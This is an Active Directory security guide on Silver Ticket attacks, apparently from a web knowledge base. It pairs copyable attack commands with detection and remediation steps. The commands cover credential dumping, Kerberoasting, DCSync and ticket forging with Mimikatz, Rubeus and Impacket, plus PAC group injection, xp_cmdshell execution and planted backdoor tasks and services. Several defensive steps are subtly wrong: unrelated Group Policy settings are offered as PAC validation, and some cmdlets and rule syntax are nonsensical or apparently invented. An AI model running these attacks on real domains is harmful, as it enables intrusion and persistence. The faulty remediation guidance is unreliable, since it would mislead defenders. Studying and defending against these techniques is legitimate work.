Silver Ticket Attack and Defense

Silver Ticket attack techniques for forging Kerberos service tickets, maintaining persistent access, and evading detection in Active Directory domains.

Description

Silver Ticket attacks are a sophisticated post-exploitation technique that exploits the Kerberos authentication protocol in Active Directory environments by forging service tickets (TGS tickets) for specific services. Unlike Golden Ticket attacks that forge Ticket Granting Tickets (TGTs) requiring the KRBTGT account hash, Silver Tickets only require the NTLM hash of a service account, making them more targeted but equally dangerous.

The attack leverages a fundamental aspect of Kerberos: service tickets are encrypted using the password hash of the service account associated with the Service Principal Name (SPN). With the service account's NTLM or AES hash, an attacker can create valid service tickets without ever contacting the Key Distribution Center (KDC), making detection significantly more challenging.

Silver Ticket attacks are particularly stealthy because:

No KDC interaction - Forged tickets bypass the domain controller entirely
Service-specific access - Attackers gain access to targeted services without domain-wide exposure
Persistence mechanism - Tickets remain valid until the service account password changes
Low detection footprint - Standard Kerberos monitoring doesn't capture ticket forgery
No account lockout - Failed authentication attempts don't trigger account lockouts

Stealth and Precision

Silver Ticket attacks can be harder to detect than Golden Tickets because they don't interact with the KDC. Forged service tickets appear as legitimate Kerberos authentication to the target service, potentially bypassing traditional security controls that focus on KDC interactions.

Impact

The impact of Silver Ticket attacks varies based on the compromised service account:

Unrestricted Service Access: Complete control over the targeted service with the permissions of the service account
Lateral Movement: Access to network services like file shares (CIFS), databases (MSSQL), and web applications (HTTP)
Privilege Escalation: Service accounts often have elevated privileges on specific systems
Data Exfiltration: Direct access to sensitive data stored in compromised services
Persistence: Long-term access as long as the service account password remains unchanged
Evasion of Security Controls: Bypasses most authentication logging and monitoring
Domain Controller Compromise: LDAP service tickets can enable AD object manipulation
Host Takeover: HOST and CIFS service tickets provide administrative control over target systems

The severity increases dramatically when high-privilege service accounts are compromised, such as:

SQL Server accounts with sysadmin rights
Exchange service accounts with administrative access
IIS application pool identities with elevated permissions
Backup service accounts with SeBackupPrivilege

Technical Details

Understanding Kerberos Service Tickets

The Kerberos authentication process involves multiple ticket types:

Authentication Flow

AS-REQ/AS-REP: User obtains Ticket Granting Ticket (TGT) from KDC
TGS-REQ: User presents TGT to request Service Ticket
TGS-REP: KDC returns Service Ticket encrypted with service account's password hash
AP-REQ: User presents Service Ticket to access service
Service Validation: Service decrypts ticket using its own password hash

Silver Ticket Forgery Process

Prerequisites for the Attack:

An attacker needs the following information to forge a Silver Ticket:

Domain SID: Security Identifier of the domain
Target SPN: Service Principal Name of the target service
Service Account Hash: NTLM or AES hash of the service account
Target User: Username to impersonate (typically a privileged account)
Domain Name: Fully qualified domain name (FQDN)

Attack Execution Workflow

Step 1: Obtain Service Account Hash

The attacker must first compromise the service account's password hash through various methods:

Method 1: Kerberoasting

# Using Rubeus to extract service tickets
Rubeus.exe kerberoast /outfile:tickets.txt

# Crack tickets offline with Hashcat
hashcat -m 13100 tickets.txt wordlist.txt -r rules/best64.rule

Method 2: Memory Dumping with Mimikatz

# Extract NTLM hashes from LSASS memory
privilege::debug
sekurlsa::logonpasswords

# Or specifically target service accounts
sekurlsa::tickets /export

Method 3: DCSync Attack

# If domain replication rights are available
lsadump::dcsync /domain:corp.local /user:svc_sql

Method 4: LSA Secrets Extraction

# On compromised servers running the service
privilege::debug
token::elevate
lsadump::secrets

Step 2: Gather Required Information

Obtain Domain SID:

# Using PowerShell
Get-ADDomain | Select-Object DomainSID

# Using WMIC
wmic useraccount get name,sid
# Extract the domain portion (everything before the last hyphen and RID)

# Using whoami
whoami /user
# S-1-5-21-3842939050-3880317879-2865463114-1000
# Domain SID: S-1-5-21-3842939050-3880317879-2865463114

Identify Target Service Principal Names:

# Enumerate SPNs for a service account
setspn -L svc_sql

# Find all SPNs in the domain
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName |
  Select-Object Name, ServicePrincipalName

Step 3: Forge the Silver Ticket

Using Mimikatz:

# Basic Silver Ticket creation for CIFS (file share access)
kerberos::golden /domain:corp.local /sid:S-1-5-21-3842939050-3880317879-2865463114 /target:DC01.corp.local /service:cifs /rc4:a87f3a337d73085c45f9416be5787d86 /user:Administrator /id:500 /ptt

# Explanation of parameters:
# /domain - Target domain FQDN
# /sid - Domain Security Identifier
# /target - Target server hostname
# /service - Service type (cifs, http, mssql, ldap, host, etc.)
# /rc4 - NTLM hash of the service account
# /user - Username to impersonate
# /id - User RID (500 for Administrator)
# /ptt - Pass The Ticket (inject into current session)

Using Impacket:

# Create Silver Ticket with ticketer.py
ticketer.py -nthash a87f3a337d73085c45f9416be5787d86 -domain-sid S-1-5-21-3842939050-3880317879-2865463114 -domain corp.local -spn cifs/DC01.corp.local Administrator

# Use the generated ticket
export KRB5CCNAME=Administrator.ccache
smbclient.py -k -no-pass corp.local/[email protected]

Using Rubeus:

# Create and inject Silver Ticket
Rubeus.exe silver /service:cifs/DC01.corp.local /rc4:a87f3a337d73085c45f9416be5787d86 /sid:S-1-5-21-3842939050-3880317879-2865463114 /ldap /user:Administrator /domain:corp.local /ptt

Step 4: Leverage the Forged Ticket

Once the Silver Ticket is created and injected, the attacker can access the targeted service:

Verify Ticket Injection:

# List current Kerberos tickets
klist

# Sample output:
# #0>	Client: Administrator @ CORP.LOCAL
#     Server: cifs/DC01.corp.local @ CORP.LOCAL
#     KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
#     Ticket Flags 0x40a00000 -> forwardable renewable pre_authent

Access Target Service:

# Access file shares
dir \\DC01.corp.local\C$

# Execute remote commands
PsExec.exe \\DC01.corp.local cmd.exe

# Access MSSQL database
sqlcmd -S SQL01.corp.local -E

Common Service Ticket Types

Common Internet File System (CIFS) / SMB

Provides access to file shares and remote administration:

# Forge CIFS ticket
kerberos::golden /domain:corp.local /sid:S-1-5-21-xxx /target:FILE01.corp.local /service:cifs /rc4:<hash> /user:Administrator /ptt

# Access file shares
dir \\FILE01.corp.local\ShareName
net use \\FILE01.corp.local\C$

Capabilities:

Access network file shares
Read/write sensitive documents
Execute remote commands via SMB
Access administrative shares (C$, ADMIN$)

Hypertext Transfer Protocol (HTTP)

Targets web applications and services:

# Forge HTTP ticket
kerberos::golden /domain:corp.local /sid:S-1-5-21-xxx /target:WEB01.corp.local /service:http /rc4:<hash> /user:Administrator /ptt

# Access web application
Invoke-WebRequest -Uri "http://WEB01.corp.local" -UseDefaultCredentials

Capabilities:

Access web applications with Kerberos authentication
Exploit IIS application pool identities
Access SharePoint sites
Manipulate web-based management interfaces

Microsoft SQL Server (MSSQL)

Compromises database services:

# Forge MSSQL ticket
kerberos::golden /domain:corp.local /sid:S-1-5-21-xxx /target:SQL01.corp.local /service:MSSQLSvc /rc4:<hash> /user:sa /ptt

# Connect to database
sqlcmd -S SQL01.corp.local -E

# Enable xp_cmdshell for command execution
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
EXEC xp_cmdshell 'whoami';

Capabilities:

Full database access
Data exfiltration
Command execution via xp_cmdshell
Linked server abuse

Lightweight Directory Access Protocol (LDAP)

Enables Active Directory manipulation:

# Forge LDAP ticket for Domain Controller
kerberos::golden /domain:corp.local /sid:S-1-5-21-xxx /target:DC01.corp.local /service:ldap /rc4:<hash> /user:Administrator /ptt

# Query Active Directory
Get-ADUser -Filter * -Server DC01.corp.local

# Modify AD objects
Set-ADUser -Identity john.doe -Description "Compromised" -Server DC01.corp.local

Capabilities:

Read Active Directory information
Modify AD objects and attributes
Create new user accounts
Add users to privileged groups

HOST Service Class

Provides comprehensive system access:

# Forge HOST ticket
kerberos::golden /domain:corp.local /sid:S-1-5-21-xxx /target:WEB01.corp.local /service:host /rc4:<hash> /user:Administrator /ptt

# Remote task scheduling
schtasks /create /s WEB01.corp.local /tn "Backdoor" /tr "cmd.exe" /sc onstart /ru SYSTEM

# Remote service manipulation
sc \\WEB01.corp.local create backdoor binPath= "cmd.exe /k calc.exe"

Capabilities:

Schedule tasks remotely
Manipulate services
Access Windows Remote Management (WinRM)
Full administrative control

Advanced Silver Ticket Techniques

PAC (Privilege Attribute Certificate) Manipulation:

The PAC contains authorization data including group memberships. Advanced attackers can craft custom PACs:

# Create Silver Ticket with custom group memberships
kerberos::golden /domain:corp.local /sid:S-1-5-21-xxx /target:DC01.corp.local /service:cifs /rc4:<hash> /user:lowpriv /groups:512,518,519 /ptt
# 512 = Domain Admins
# 518 = Schema Admins
# 519 = Enterprise Admins

Cross-Domain Silver Tickets:

In multi-domain environments, attackers can forge tickets across trust boundaries:

# Forge ticket for child domain
kerberos::golden /domain:child.corp.local /sid:S-1-5-21-xxx /target:SERVER.child.corp.local /service:cifs /rc4:<hash> /user:Administrator /sids:S-1-5-21-yyy-519 /ptt

Detection

Silver Ticket detection is challenging due to the absence of KDC interaction, requiring behavioral analysis and anomaly detection.

Event Log Indicators

Event ID 4769: Kerberos Service Ticket Request

Critical Limitation

Silver Ticket attacks do NOT generate Event ID 4769 on the Domain Controller because the forged ticket never contacts the KDC. Detection must focus on the target service itself.

Event ID 4624: Account Logon

Monitor logon events on target services:

<QueryList>
  <Query Id="0" Path="Security">
    <Select Path="Security">
      *[System[(EventID=4624)]]
      and
      *[EventData[Data[@Name='LogonType']='3']]
      and
      *[EventData[Data[@Name='AuthenticationPackageName']='Kerberos']]
    </Select>
  </Query>
</QueryList>

Suspicious Indicators:

Logons from service accounts outside normal service hours
Logons from unusual source IP addresses or workstations
Service accounts authenticating interactively (LogonType 2 or 10)
Accounts accessing services they don't normally use

Event ID 4672: Special Privileges Assigned

Tracks when accounts with administrative privileges authenticate:

# Monitor for unexpected privilege assignments
Get-WinEvent -FilterHashtable @{LogName='Security';ID=4672} |
  Where-Object {$_.Properties[1].Value -like "*SeDebugPrivilege*"} |
  Select-Object TimeCreated, @{N='Account';E={$_.Properties[0].Value}}

Advanced Detection Techniques

Ticket Lifetime Anomalies:

Silver Tickets often have unusual ticket lifetimes:

# Check for tickets with maximum lifetime (10 hours default)
klist

# Suspicious indicators:
# - Tickets with exactly 10-hour lifetimes
# - Tickets not expiring at expected intervals
# - Tickets created with future timestamps

Encryption Type Monitoring:

Forged tickets often use RC4 encryption instead of AES:

-- Splunk query for RC4 usage
index=windows EventCode=4624
| where AuthenticationPackageName="Kerberos" AND EncryptionType="0x17"
| stats count by TargetUserName, IpAddress, TargetDomainName

PAC Validation Failures:

Enable PAC validation to detect forged tickets:

# Enable PAC validation via Group Policy
# Computer Configuration > Windows Settings > Security Settings > Local Policies > Security Options
# "Domain controller: Require LDAP client signing" = Enabled

Monitor for Event ID 4 (Kerberos Error) with Status Code 0x1F (KRB_AP_ERR_INTEGRITY):

<QueryList>
  <Query Id="0" Path="System">
    <Select Path="System">
      *[System[(EventID=4)]]
      and
      *[EventData[Data='0x1F']]
    </Select>
  </Query>
</QueryList>

SIEM Detection Rules

Sigma Rule for Silver Ticket Detection:

title: Potential Silver Ticket Attack
description: Detects potential Silver Ticket attacks through authentication anomalies
status: experimental
logsource:
  product: windows
  service: security
detection:
  selection:
    EventID: 4624
    LogonType: 3
    AuthenticationPackageName: 'Kerberos'
  filter:
    # Add baseline exceptions
  condition: selection and not filter
  timeframe: 10m
  count:
    min: 5
fields:
  - TargetUserName
  - IpAddress
  - WorkstationName
falsepositives:
  - Legitimate service account authentication
  - Automated systems with Kerberos authentication
level: high

Splunk Detection Query:

index=windows EventCode=4624 LogonType=3 AuthenticationPackageName="Kerberos"
| eval service_account=if(match(TargetUserName, "^svc_.*|^service.*"), 1, 0)
| where service_account=1
| stats count by TargetUserName, IpAddress, ComputerName, _time
| where count > 10
| eval anomaly_score=count*2

Behavioral Analytics

Implement machine learning models to baseline normal service account behavior:

Training Phase: Learn normal authentication patterns for 30+ days
Detection Phase: Alert on deviations from baseline
Key Metrics:
- Authentication timing patterns
- Source IP address distribution
- Target service access patterns
- Encryption type usage
- Ticket lifetime distributions

Remediation

Immediate response to suspected Silver Ticket attacks requires coordinated action across multiple systems.

Immediate Response Steps

Step 1: Identify Compromised Service Accounts

# Review recent service account authentications
Get-WinEvent -FilterHashtable @{LogName='Security';ID=4624;StartTime=(Get-Date).AddHours(-24)} |
  Where-Object {$_.Properties[5].Value -eq 3 -and $_.Properties[8].Value -eq 'Kerberos'} |
  Select-Object TimeCreated, @{N='User';E={$_.Properties[5].Value}}, @{N='Source';E={$_.Properties[18].Value}} |
  Group-Object User | Where-Object {$_.Count -gt 50}

Step 2: Reset Service Account Passwords

Critical: Password reset invalidates all Silver Tickets

# Generate strong random password (32+ characters)
$NewPassword = -join ((48..57) + (65..90) + (97..122) + (33..47) | Get-Random -Count 32 | % {[char]$_})

# Reset service account password
Set-ADAccountPassword -Identity svc_sql -NewPassword (ConvertTo-SecureString $NewPassword -AsPlainText -Force) -Reset

# Update service configuration with new password
# Option 1: Using Services MMC (services.msc)
# Option 2: Using PowerShell
$service = Get-Service -Name MSSQLSERVER
$service | Set-Service -StartupType Automatic -Credential (Get-Credential CORP\svc_sql)

# Restart service to apply new credentials
Restart-Service -Name MSSQLSERVER

Step 3: Revoke Existing Tickets

# On compromised systems, purge Kerberos tickets
klist purge

# Force ticket renewal via GPO
gpupdate /force

# On Domain Controllers, trigger replication
repadmin /syncall /AdeP

Step 4: Enable PAC Validation

# Enable PAC signature validation (Group Policy)
# Computer Configuration > Policies > Windows Settings > Security Settings > Local Policies > Security Options
# "Domain controller: Refuse machine account password changes" = Disabled
# "Domain controller: Allow server operators to schedule tasks" = Disabled

# Verify PAC validation is enforced
Get-GPResultantSetOfPolicy -ReportType HTML -Path C:\Temp\RSoP.html

Step 5: Hunt for Persistence Mechanisms

# Check for scheduled tasks created by compromised accounts
Get-ScheduledTask | Where-Object {$_.Principal.UserId -like "*svc_*"} | Select-Object TaskName, TaskPath, Actions

# Review service modifications
Get-WmiObject Win32_Service | Where-Object {$_.StartName -like "*svc_*"} | Select-Object Name, PathName, StartName, State

# Audit file system changes
Get-ChildItem -Path C:\Windows\System32 -Recurse | Where-Object {$_.LastWriteTime -gt (Get-Date).AddDays(-7)}

Long-Term Mitigation Strategies

1. Implement Group Managed Service Accounts (gMSA)

gMSAs eliminate password-based attacks through automatic 240-character password rotation:

# Create KDS Root Key (one-time domain setup)
Add-KdsRootKey -EffectiveTime ((Get-Date).AddHours(-10))

# Create gMSA for SQL Server
New-ADServiceAccount -Name gmsa_sql -DNSHostName SQL01.corp.local -PrincipalsAllowedToRetrieveManagedPassword "SQL Servers" -ServicePrincipalNames "MSSQLSvc/SQL01.corp.local:1433"

# Install gMSA on target server
Install-ADServiceAccount -Identity gmsa_sql

# Configure service to use gMSA (no password storage required)
Set-Service -Name MSSQLSERVER -StartupType Automatic -Credential "CORP\gmsa_sql$"

2. Enforce AES Encryption

Disable RC4 and enforce AES encryption domain-wide:

# Configure supported encryption types for service accounts
Set-ADUser -Identity svc_sql -KerberosEncryptionType AES256, AES128

# Domain-wide policy (Group Policy)
# Computer Configuration > Policies > Windows Settings > Security Settings > Local Policies > Security Options
# "Network security: Configure encryption types allowed for Kerberos"
# Enabled: AES256_HMAC_SHA1, AES128_HMAC_SHA1
# Disabled: DES_CBC_CRC, DES_CBC_MD5, RC4_HMAC_MD5

# Verify encryption types
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties msDS-SupportedEncryptionTypes |
  Select-Object Name, @{N='EncryptionTypes';E={$_.'msDS-SupportedEncryptionTypes'}}

3. Enable PAC Signature Validation

Force validation of PAC signatures to detect forged tickets:

# Enable PAC validation (requires Windows Server 2012+ DCs)
Set-ADDomainController -Identity DC01 -OperationMasterRole 0

# Configure via Registry (all servers)
New-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\Kerberos\Parameters" -Name "ValidateKdcPacSignature" -Value 1 -PropertyType DWORD -Force

4. Implement Service Account Hardening

# Disable interactive logon for service accounts
$serviceAccounts = Get-ADUser -Filter {ServicePrincipalName -ne "$null"}
foreach ($account in $serviceAccounts) {
    Set-ADUser -Identity $account -UserPrincipalName "$($account.SamAccountName)@corp.local"
    Set-ADAccountControl -Identity $account -CannotChangePassword $true
    Set-ADAccountControl -Identity $account -PasswordNeverExpires $false
}

# Set logon restrictions
Set-ADUser -Identity svc_sql -LogonWorkstations "SQL01,SQL02"

# Deny interactive logon via GPO
# Computer Configuration > Policies > Windows Settings > Security Settings > Local Policies > User Rights Assignment
# "Deny log on locally" = Add service accounts
# "Deny log on through Remote Desktop Services" = Add service accounts

5. Implement Privileged Access Management (PAM)

# Enable PAM monitoring for service accounts
Install-WindowsFeature -Name FS-Resource-Manager -IncludeManagementTools

# Create PAM request workflow
New-PAMRole -DisplayName "SQL Service Account Access" -Privileges "svc_sql" -Candidates "DB Admins"

# Require approval for service account password access
Set-PAMTrustConfiguration -EnableApprovalWorkflow $true

Prevention Best Practices

Service Account Security Framework

Strong Password Policies

Implement rigorous password requirements for service accounts:

# Set fine-grained password policy for service accounts
New-ADFineGrainedPasswordPolicy -Name "ServiceAccountPolicy" -Precedence 10 -ComplexityEnabled $true -MinPasswordLength 32 -PasswordHistoryCount 24 -MaxPasswordAge "90" -MinPasswordAge "1" -LockoutDuration "00:30:00" -LockoutObservationWindow "00:30:00" -LockoutThreshold 5

# Apply to service accounts OU
Add-ADFineGrainedPasswordPolicySubject -Identity "ServiceAccountPolicy" -Subjects "OU=ServiceAccounts,DC=corp,DC=local"

# Generate cryptographically secure passwords
Function Generate-ServicePassword {
    $length = 32
    $charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()_+-=[]{}|;:,.<>?"
    $rng = New-Object System.Security.Cryptography.RNGCryptoServiceProvider
    $bytes = New-Object byte[]($length)
    $rng.GetBytes($bytes)
    $result = ""
    for ($i = 0; $i -lt $length; $i++) {
        $result += $charset[$bytes[$i] % $charset.Length]
    }
    return $result
}

Recommendations:

Minimum 25 characters for standard service accounts
Minimum 32 characters for high-privilege accounts
Rotate passwords every 60-90 days
Never reuse passwords across accounts

Principle of Least Privilege

Minimize service account permissions to reduce attack impact:

# Audit current service account privileges
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties MemberOf |
  Select-Object Name, @{N='Groups';E={$_.MemberOf -join '; '}} |
  Where-Object {$_.Groups -match "Domain Admins|Enterprise Admins|Schema Admins"}

# Remove unnecessary privileges
Remove-ADGroupMember -Identity "Domain Admins" -Members svc_backup -Confirm:$false

# Create custom service-specific groups
New-ADGroup -Name "SQL Service Admins" -GroupScope Global -GroupCategory Security
Add-ADGroupMember -Identity "SQL Service Admins" -Members svc_sql

# Grant specific permissions instead of broad groups
dsacls "CN=SQL Service Admins,OU=Groups,DC=corp,DC=local" /G "SQL Service Admins:RPWP;member"

Comprehensive Monitoring

Implement robust monitoring for service account activities:

# Enable advanced Kerberos auditing
auditpol /set /subcategory:"Kerberos Service Ticket Operations" /success:enable /failure:enable
auditpol /set /subcategory:"Kerberos Authentication Service" /success:enable /failure:enable

# Configure SIEM forwarding for critical events
$events = @(4624, 4625, 4672, 4768, 4769, 4770, 4771)
foreach ($event in $events) {
    wevtutil sl Security /ca:O:BAG:SYD:(A;;0xf0005;;;SY)(A;;0x5;;;BA)(A;;0x1;;;S-1-5-32-573)
}

# Deploy monitoring script
$MonitoringScript = @'
$serviceAccounts = Get-ADUser -Filter {ServicePrincipalName -ne "$null"} | Select-Object -ExpandProperty SamAccountName
while ($true) {
    $events = Get-WinEvent -FilterHashtable @{LogName='Security';ID=4624;StartTime=(Get-Date).AddMinutes(-5)} |
      Where-Object {$serviceAccounts -contains $_.Properties[5].Value}

    foreach ($event in $events) {
        $user = $event.Properties[5].Value
        $source = $event.Properties[18].Value
        $logonType = $event.Properties[8].Value

        # Alert on suspicious logon types
        if ($logonType -in @(2,10)) {
            Write-Warning "Interactive logon detected for service account $user from $source"
        }
    }
    Start-Sleep -Seconds 60
}
'@

Network Segmentation

Isolate services and limit lateral movement:

# Create dedicated security zones
New-NetFirewallRule -DisplayName "SQL Server Access Control" -Direction Inbound -Protocol TCP -LocalPort 1433 -Action Allow -RemoteAddress "10.10.10.0/24"

# Implement micro-segmentation
Enable-NetFirewallRule -DisplayGroup "Windows Defender Firewall Remote Management"

# Restrict service account network access
$serviceAccount = Get-ADUser -Identity svc_sql
Set-ADUser -Identity $serviceAccount -Add @{msDS-AllowedToDelegateTo="MSSQLSvc/SQL01.corp.local"}

Key Principles:

Isolate critical services in separate VLANs
Implement zero-trust network architecture
Restrict service account access to specific subnets
Deploy host-based firewalls on all servers

Regular Security Audits

Perform periodic reviews of service account security posture:

# Automated audit script
Function Invoke-ServiceAccountAudit {
    $results = @()

    # Gather all service accounts
    $serviceAccounts = Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties *

    foreach ($account in $serviceAccounts) {
        $passwordAge = (Get-Date) - $account.PasswordLastSet
        $lastLogon = $account.LastLogonDate
        $isAdmin = ($account.MemberOf -match "Domain Admins|Enterprise Admins|Schema Admins")

        $results += [PSCustomObject]@{
            Name = $account.Name
            SamAccountName = $account.SamAccountName
            PasswordAge = $passwordAge.Days
            LastLogon = $lastLogon
            IsAdministrator = $isAdmin
            Enabled = $account.Enabled
            PasswordNeverExpires = $account.PasswordNeverExpires
            CannotChangePassword = $account.CannotChangePassword
            SPNs = $account.ServicePrincipalName -join '; '
        }
    }

    # Export results
    $results | Export-Csv -Path "ServiceAccountAudit_$(Get-Date -Format 'yyyyMMdd').csv" -NoTypeInformation

    # Identify high-risk accounts
    $results | Where-Object {$_.PasswordAge -gt 90 -or $_.IsAdministrator -eq $true} |
      Format-Table -AutoSize
}

# Schedule audit monthly
$trigger = New-JobTrigger -Weekly -DaysOfWeek Monday -At 2am
Register-ScheduledJob -Name "ServiceAccountAudit" -Trigger $trigger -ScriptBlock ${Function:Invoke-ServiceAccountAudit}

Verification

Validate Security Posture

Check for Vulnerable Service Accounts

# Identify service accounts with weak encryption
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties msDS-SupportedEncryptionTypes |
  Where-Object {$_.'msDS-SupportedEncryptionTypes' -band 0x04 -or $_.'msDS-SupportedEncryptionTypes' -eq $null} |
  Select-Object Name, SamAccountName, @{N='EncryptionTypes';E={$_.'msDS-SupportedEncryptionTypes'}}

# Review password ages
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties PasswordLastSet |
  Select-Object Name, PasswordLastSet, @{N='PasswordAge';E={(Get-Date) - $_.PasswordLastSet}} |
  Where-Object {$_.PasswordAge.Days -gt 90} |
  Sort-Object PasswordAge -Descending

Test Detection Capabilities

Controlled Testing (Authorized Only):

# Create test service account
New-ADUser -Name "svc_test" -SamAccountName "svc_test" -ServicePrincipalNames "HTTP/test.corp.local" -AccountPassword (ConvertTo-SecureString "P@ssw0rd123!" -AsPlainText -Force) -Enabled $true

# Attempt Silver Ticket creation in isolated environment
# Verify SIEM alerts trigger
# Confirm incident response procedures activate

Audit gMSA Implementation

# List all gMSAs
Get-ADServiceAccount -Filter * |
  Select-Object Name, DNSHostName, Enabled, @{N='PasswordLastSet';E={$_.PasswordLastSet}}

# Verify automatic password rotation
Get-ADServiceAccount -Identity gmsa_sql -Properties msDS-ManagedPasswordInterval, msDS-ManagedPassword

# Confirm gMSA usage on servers
Get-Service | Where-Object {$_.StartName -like "*$"} | Select-Object Name, DisplayName, StartName, Status

Verify Encryption Configuration

# Check domain-wide encryption settings
Get-ADDomain | Select-Object -ExpandProperty msDS-SupportedEncryptionTypes

# Verify individual service account configurations
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties msDS-SupportedEncryptionTypes |
  Select-Object Name, @{N='Encryption';E={
    switch ($_.'msDS-SupportedEncryptionTypes') {
      1 {'DES-CBC-CRC'}
      2 {'DES-CBC-MD5'}
      4 {'RC4-HMAC'}
      8 {'AES128-HMAC'}
      16 {'AES256-HMAC'}
      default {'Mixed'}
    }
  }}

Advanced Considerations

Detecting Silver Tickets in Cloud-Hybrid Environments

Azure AD Connect Scenarios:

# Identify Azure AD Connect sync accounts with SPNs
Get-ADUser -Filter {ServicePrincipalName -like "*AAD*"} -Properties ServicePrincipalName, LastLogonDate

# Monitor for unusual synchronization account activity
Get-ADUser -Filter {Name -like "*MSOL*" -or Name -like "*AAD*"} -Properties LastLogonDate, PasswordLastSet

Multi-Forest Environments:

# Enumerate cross-forest service accounts
$forests = (Get-ADForest).Domains
foreach ($domain in $forests) {
    Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Server $domain -Properties ServicePrincipalName |
      Select-Object @{N='Domain';E={$domain}}, Name, ServicePrincipalName
}

Silver Ticket vs Golden Ticket

Understanding the Differences

Silver Tickets:

Require service account hash (not KRBTGT)
Provide access to specific services only
Do not contact the KDC
Harder to detect, narrower scope
Invalidated by changing service account password

Golden Tickets:

Require KRBTGT account hash
Provide domain-wide access
Can request any service ticket
Easier to detect, broader impact
Invalidated only by KRBTGT password reset (twice)

Persistence Through Silver Tickets

Attackers often use Silver Tickets for long-term persistence:

Scheduled Task Creation: Use HOST ticket to create persistent scheduled tasks
Service Installation: Install backdoor services with CIFS access
Certificate Enrollment: Use LDAP access to enroll certificates for future authentication
Backup Account Creation: Create hidden accounts using LDAP manipulation

References

Tools Documentation

Mimikatz - Silver Ticket creation
Rubeus - Kerberos abuse toolkit
Impacket ticketer - Python ticket forging

Next Steps

If Silver Ticket vulnerabilities are identified:

Immediately reset all identified compromised service account passwords
Implement gMSAs for all compatible services within 60 days
Deploy PAC validation across all domain controllers and member servers
Enable advanced auditing for Kerberos events with SIEM integration
Review related Active Directory attack techniques:
- Kerberoasting
- KrbRelayUp

Takeaway: Silver Ticket attacks represent a significant threat to Active Directory environments due to their stealth and effectiveness. Implementing Group Managed Service Accounts, enforcing AES encryption, enabling PAC validation, and deploying comprehensive monitoring creates a robust defense-in-depth strategy. Service account security must be a top priority in every Active Directory hardening program.

Silver Ticket Attack and Defense

On this page